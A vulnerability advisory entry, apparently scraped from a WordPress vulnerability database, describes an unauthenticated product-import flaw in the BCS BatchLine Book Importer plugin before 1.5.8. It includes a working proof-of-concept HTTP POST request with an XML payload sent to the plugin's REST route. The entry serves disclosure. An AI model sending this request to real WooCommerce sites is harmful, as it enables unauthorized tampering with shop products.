Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:23B76562-D2AF-4753-BCE4-002921F3378E
HistoryJun 14, 2021 - 12:00 a.m.

BCS BatchLine Book Importer < 1.5.8 - Unauthenticated Product Import

2021-06-1400:00:00
wpvulndb
391
JSON

The plugin did not correctly check for permission in its wc/v3/bcsbertlinebookimport REST route, allowing unauthenticated to import arbitrary products or update existing ones

POST /wp-json/wc/v3/bcsbertlinebookimport HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 200
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<books><book><isbn>123</isbn><title>Malicious Product</title><content>YOLO</content><price>0</price><stock>2</stock></book></books>
JSON